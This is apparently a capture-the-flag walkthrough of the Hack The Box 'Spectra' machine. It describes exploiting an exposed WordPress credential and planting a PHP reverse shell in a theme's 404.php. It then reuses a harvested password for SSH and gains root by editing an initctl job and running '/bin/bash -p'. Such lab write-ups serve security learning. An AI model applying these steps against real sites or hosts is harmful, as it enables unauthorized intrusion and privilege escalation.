In this post, i would like to share a walkthrough of the Spectra Machine.


This room has been considered difficulty rated as an EASY machine

Information Gathering on Spectra


Once we have started the VPN connection, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN 


There are a lot of ports open for this machine


Firstly, we need to add the IP Address to the /etc/hosts file


Let’s open the browser and straight into the website interface.


There’s two link that we can try later.


Based on my experience, the website interface looks like to be WordPress. Normally, wp-admin is the location of the default login page for WordPress.

Gaining Access on Spectra mamcchine


However, I don’t have the credentials for the username and password


Another link lead us to an index directory which contain all file that normally use by WordPress


When we open the wp-config.php file, we are presented with the error “Error establishing a database connetion”


Let’s move one directory backwards and see what’s stored inside. We cannot see anything on the interface.


Let’s test our luck by checking the source code of the interface.


Inside the source code, there’s username and password that might be useful


Let’s try the username and password that we found on the login page of WordPress


The credentials that we gains is not totally correct. We get error “Unknown username” which mean that only the username is incorrect over here.


Let’s execute wpscan command such as wpsan –url spectra.htb/main -e u to get the username of the login.


We have been notified that administrator is valid in the machine.

Enumerate the WordPress dashboard


Let’s try login in using the credentials mention above.


We manage to login to WordPress Dashboard as shown above.


Normally, i will use reverse shell on Appearance > Theme Editor > 404.php


We can copy-paste the PHP reverse shell on the 404.php by changing IP Address and Port


While looking into nc listener back, we still not get back the reverse shell connection


We will try on different theme which i will be using Twenty Seventeen


We can go to the url such as spectra.htb/main/wp-content/themes/twentyseventeen/404.php


I managed to get back the reverse shell connection to us


Normally, there should be something fishy hidden on /opt directory and we notice that autologin.conf.orig look suspicious


While we read the source code carefully, we notice that /etc/autologin directory that worth to look into.


Oh wow! There is a file called passwd saved in the directory


Oh wow! We get the password for something which i still ensure the purpose of the password here. We should be looking for the username and the purpose of the password


Let’s read the file such as /etc/passwd which we might find any user that we can use


We did find the username Katie that stored in the machine. We will be going back to nmap result output whether any port opens for credentials to be used.

Maintaining Access


I found out that ssh service port is open. So, let’s ssh the machine using credentials such as katie and SummerHereWeCome!!


We are logged in the machine via ssh. We should be able to read the user flag by using the command “cat user.txt”


I got the user flag and slap it inside the HTB website.

Escalate to Root Privileges Access


Let’s see any SUID that we can use to escalate to root

Source: https://linux.die.net/man/8/initctl

There’s initctl service that we can use. We should be researching the service to see what the service can do and cannot do.


After some research on the machine, let’s open /etc/init that we can use


There’s a lot of file that we can see here.


The file that caught my attention is shown above. Let’s see what is written in the test.conf


The screenshot above is the original source code that you will be able to see


We need to stop and start the initcctl by execute sudo /sbin/initctl stop test (stop) and sudo /sbin/initctl start test ( start)


Let’s tweet the source code a little bit between the script and end script


Let’s run the /bin/bash -p but nothing happen. We will have to re-execute back the step above


If all the step above is successfully, we will see something like the screenshot above.


After we manage to run /bin/bash -p, we can verify on the current location by running id command. We can be considered inside root privileges access when you see euid=0(root) egid=0(root) groups=0(root)


Let’s read the root user kat stored at /root/ directory as usual


-THE END-


Happy Learning Guys!